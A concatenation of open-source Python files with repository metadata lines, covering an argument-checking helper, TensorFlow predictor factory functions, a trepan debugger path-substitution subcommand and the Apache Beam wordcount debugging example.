raise ValueError('The following keyword-only arguments have not been supplied in kwargs: %s' %
', '.join(unsatisfied_kwargs))
# Check that the callable can accept the given number of positional arguments
if not has_varargs and unmatched_args:
raise ValueError('The list of positional arguments is longer than the target callable can handle '
'(allowed: %d, given in args: %d)' % (len(args) - len(unmatched_args), len(args)))
# Check that the callable can accept the given keyword arguments
if not has_var_kwargs and unmatched_kwargs:
raise ValueError('The target callable does not accept the following keyword arguments: %s' %
', '.join(unmatched_kwargs))
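# Illustrative sketch (not part of the library): check_callable_args() is a
# pre-flight check that raises ValueError when the given args/kwargs cannot
# satisfy the target callable's signature.
#
#   def job(a, b, c=1): pass
#   check_callable_args(job, (1,), {'b': 2})   # fine: a=1, b=2, c defaults
#   check_callable_args(job, (1,), {})         # ValueError: 'b' has not been supplied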
|
gpl-3.0
|
meteorcloudy/tensorflow
|
tensorflow/contrib/predictor/predictor_factories.py
|
10
|
5570
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Factory functions for `Predictor`s."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.predictor import contrib_estimator_predictor
from tensorflow.contrib.predictor import core_estimator_predictor
from tensorflow.contrib.predictor import saved_model_predictor
from tensorflow.contrib.learn.python.learn.estimators import estimator as contrib_estimator
from tensorflow.python.estimator import estimator as core_estimator
def from_contrib_estimator(estimator,
prediction_input_fn,
input_alternative_key=None,
output_alternative_key=None,
graph=None,
config=None):
"""Constructs a `Predictor` from a `tf.contrib.learn.Estimator`.
Args:
estimator: an instance of `tf.contrib.learn.Estimator`.
prediction_input_fn: a function that takes no arguments and returns an
instance of `InputFnOps`.
input_alternative_key: Optional. Specify the input alternative used for
prediction.
output_alternative_key: Specify the output alternative used for
prediction. Not needed for single-headed models but required for
multi-headed models.
graph: Optional. The Tensorflow `graph` in which prediction should be
done.
config: `ConfigProto` proto used to configure the session.
Returns:
An initialized `Predictor`.
Raises:
TypeError: if `estimator` is a core `Estimator` instead of a contrib
`Estimator`.
"""
if isinstance(estimator, core_estimator.Estimator):
raise TypeError('Expected estimator to be of type '
'tf.contrib.learn.Estimator, but got type '
'tf.python.estimator.Estimator. You likely want to call '
'from_estimator.')
return contrib_estimator_predictor.ContribEstimatorPredictor(
estimator,
prediction_input_fn,
input_alternative_key=input_alternative_key,
output_alternative_key=output_alternative_key,
graph=graph,
config=config)
def from_estimator(estimator,
serving_input_receiver_fn,
output_key=None,
graph=None,
config=None):
"""Constructs a `Predictor` from a `tf.python.estimator.Estimator`.
Args:
    estimator: an instance of `tf.python.estimator.Estimator`.
serving_input_receiver_fn: a function that takes no arguments and returns
an instance of `ServingInputReceiver` compatible with `estimator`.
output_key: Optional string specifying the export output to use. If
`None`, then `DEFAULT_SERVING_SIGNATURE_DEF_KEY` is used.
graph: Optional. The Tensorflow `graph` in which prediction should be
done.
config: `ConfigProto` proto used to configure the session.
Returns:
An initialized `Predictor`.
Raises:
TypeError: if `estimator` is a contrib `Estimator` instead of a core
`Estimator`.
"""
if isinstance(estimator, contrib_estimator.Estimator):
raise TypeError('Expected estimator to be of type '
'tf.python.estimator.Estimator, but got type '
'tf.contrib.learn.Estimator. You likely want to call '
'from_contrib_estimator.')
return core_estimator_predictor.CoreEstimatorPredictor(
estimator,
serving_input_receiver_fn,
output_key=output_key,
graph=graph,
config=config)
def from_saved_model(export_dir,
signature_def_key=None,
signature_def=None,
tags=None,
graph=None,
config=None):
"""Constructs a `Predictor` from a `SavedModel` on disk.
Args:
export_dir: a path to a directory containing a `SavedModel`.
signature_def_key: Optional string specifying the signature to use. If
`None`, then `DEFAULT_SERVING_SIGNATURE_DEF_KEY` is used. Only one of
      `signature_def_key` and `signature_def` should be specified.
signature_def: A `SignatureDef` proto specifying the inputs and outputs
for prediction. Only one of `signature_def_key` and `signature_def`
should be specified.
tags: Optional. Tags that will be used to retrieve the correct
`SignatureDef`. Defaults to `DEFAULT_TAGS`.
    graph: Optional. The TensorFlow `graph` in which prediction should be
done.
config: `ConfigProto` proto used to configure the session.
Returns:
An initialized `Predictor`.
Raises:
ValueError: More than one of `signature_def_key` and `signature_def` is
specified.
"""
return saved_model_predictor.SavedModelPredictor(
export_dir,
signature_def_key=signature_def_key,
signature_def=signature_def,
tags=tags,
graph=graph,
config=config)
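# Illustrative usage sketch (not part of the original module; the export
# directory and feed key are hypothetical, and in practice these factories
# are typically reached as tf.contrib.predictor.from_saved_model(...)):
#
#   pred = from_saved_model('/tmp/my_saved_model')
#   outputs = pred({'inputs': [[1.0, 2.0, 3.0]]})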
|
apache-2.0
|
rocky/python2-trepan
|
trepan/processor/command/set_subcmd/patsub.py
|
2
|
1775
|
# -*- coding: utf-8 -*-
# Copyright (C) 2020 Rocky Bernstein
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# Our local modules
from trepan.processor.command import base_subcmd as Mbase_subcmd
class SetPatSub(Mbase_subcmd.DebuggerSubcommand):
"""**set patsub** *from-re* *replace-string*
Add a substitution pattern rule replacing text that matches *from-re* with
*replace-string* anywhere it is found in source file names. If a
substitution rule was previously set for *from-re*, the old rule is
replaced by the new one.
In the following example, suppose that inside a docker container /mnt/project
is the mount point for /home/rocky/project. You are running the code inside
the docker container but debugging it from outside the container.
Example:
--------
    set patsub ^/mnt/project /home/rocky/project
"""
in_list = True
max_args = 2
min_abbrev = len("pats")
min_args = 2
short_help = "Set pattern substitution rule"
def run(self, args):
self.proc.add_remap_pat(args[0], args[1])
pass
if __name__ == "__main__":
from trepan.processor.command.set_subcmd import __demo_helper__ as Mhelper
Mhelper.demo_run(SetPatSub)
pass
|
gpl-3.0
|
wtanaka/beam
|
sdks/python/apache_beam/examples/wordcount_debugging.py
|
8
|
6469
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""An example that verifies the counts and includes best practices.
On top of the basic concepts in the wordcount example, this workflow introduces
logging to Cloud Logging and the use of assertions in a Dataflow pipeline.
To execute this pipeline locally, specify a local output file or output prefix
on GCS::
--output [YOUR_LOCAL_FILE | gs://YOUR_OUTPUT_PREFIX]
To execute this pipeline using the Google Cloud Dataflow service, specify
pipeline configuration::
--project YOUR_PROJECT_ID
--staging_location gs://YOUR_STAGING_DIRECTORY
--temp_location gs://YOUR_TEMP_DIRECTORY
--job_name YOUR_JOB_NAME
--runner DataflowRunner
and an output prefix on GCS::
--output gs://YOUR_OUTPUT_PREFIX
"""
from __future__ import absolute_import
import argparse
import logging
import re
import apache_beam as beam
from apache_beam.io import ReadFromText
from apache_beam.io import WriteToText
from apache_beam.metrics import Metrics
from apache_beam.options.pipeline_options import PipelineOptions
from apache_beam.options.pipeline_options import SetupOptions
from apache_beam.testing.util import assert_that
from apache_beam.testing.util import equal_to
class FilterTextFn(beam.DoFn):
"""A DoFn that filters for a specific key based on a regular expression."""
def __init__(self, pattern):
super(FilterTextFn, self).__init__()
self.pattern = pattern
# A custom metric can track values in your pipeline as it runs. Those
# values will be available in the monitoring system of the runner used
    # to run the pipeline. The counters below track the number of
# matched and unmatched words.
self.matched_words = Metrics.counter(self.__class__, 'matched_words')
    self.unmatched_words = Metrics.counter(self.__class__, 'unmatched_words')
def process(self, element):
word, _ = element
if re.match(self.pattern, word):
# Log at INFO level each element we match. When executing this pipeline
# using the Dataflow service, these log lines will appear in the Cloud
# Logging UI.
logging.info('Matched %s', word)
self.matched_words.inc()
yield element
else:
# Log at the "DEBUG" level each element that is not matched. Different log
      # levels can be used to control the verbosity of logging, providing an
# effective mechanism to filter less important information.
# Note currently only "INFO" and higher level logs are emitted to the
# Cloud Logger. This log message will not be visible in the Cloud Logger.
logging.debug('Did not match %s', word)
      self.unmatched_words.inc()
class CountWords(beam.PTransform):
"""A transform to count the occurrences of each word.
A PTransform that converts a PCollection containing lines of text into a
PCollection of (word, count) tuples.
"""
def expand(self, pcoll):
return (pcoll
| 'split' >> (beam.FlatMap(lambda x: re.findall(r'[A-Za-z\']+', x))
.with_output_types(unicode))
| 'pair_with_one' >> beam.Map(lambda x: (x, 1))
| 'group' >> beam.GroupByKey()
| 'count' >> beam.Map(lambda (word, ones): (word, sum(ones))))
def run(argv=None):
"""Runs the debugging wordcount pipeline."""
parser = argparse.ArgumentParser()
parser.add_argument('--input',
dest='input',
default='gs://dataflow-samples/shakespeare/kinglear.txt',
help='Input file to process.')
parser.add_argument('--output',
dest='output',
required=True,
help='Output file to write results to.')
known_args, pipeline_args = parser.parse_known_args(argv)
# We use the save_main_session option because one or more DoFn's in this
# workflow rely on global context (e.g., a module imported at module level).
pipeline_options = PipelineOptions(pipeline_args)
pipeline_options.view_as(SetupOptions).save_main_session = True
with beam.Pipeline(options=pipeline_options) as p:
# Read the text file[pattern] into a PCollection, count the occurrences of
# each word and filter by a list of words.
filtered_words = (
p | 'read' >> ReadFromText(known_args.input)
| CountWords()
| 'FilterText' >> beam.ParDo(FilterTextFn('Flourish|stomach')))
# assert_that is a convenient PTransform that checks a PCollection has an
    # expected value. Assertions are best used in unit tests with small data
    # sets, but one is demonstrated here as a teaching tool.
#
# Note assert_that does not provide any output and that successful
# completion of the Pipeline implies that the expectations were met. Learn
# more at https://cloud.google.com/dataflow/pipelines/testing-your-pipeline
# on how to best test your pipeline.
assert_that(
filtered_words, equal_to([('Flourish', 3), ('stomach', 1)]))
# Format the counts into a PCollection of strings and write the output using
# a "Write" transform that has side effects.
# pylint: disable=unused-variable
output = (filtered_words
| 'format' >> beam.Map(lambda (word, c): '%s: %s' % (word, c))
| 'write' >> WriteToText(known_args.output))
if __name__ == '__main__':
# Cloud Logging would contain only logging.INFO and higher level logs logged
# by the root logger. All log statements emitted by the root logger will be
# visible in the Cloud Logging UI. Learn more at
# https://cloud.google.com/logging about the Cloud Logging UI.
#
# You can set the default logging level to a different level when running
# locally.
logging.getLogger().setLevel(logging.INFO)
run()
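# Hedged sketch (not part of the original example): one way the custom
# counters defined in FilterTextFn could be inspected after execution,
# assuming the pipeline is run explicitly (rather than through the `with`
# block above) so that the PipelineResult is available. MetricsFilter is
# the standard Beam metrics query API; whether committed values are
# populated depends on the runner used.
#
#   from apache_beam.metrics.metric import MetricsFilter
#
#   result = p.run()
#   result.wait_until_finish()
#   matched = result.metrics().query(
#       MetricsFilter().with_name('matched_words'))['counters']
#   for counter_result in matched:
#     logging.info('matched_words counter: %s', counter_result.committed)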
|
apache-2.0
|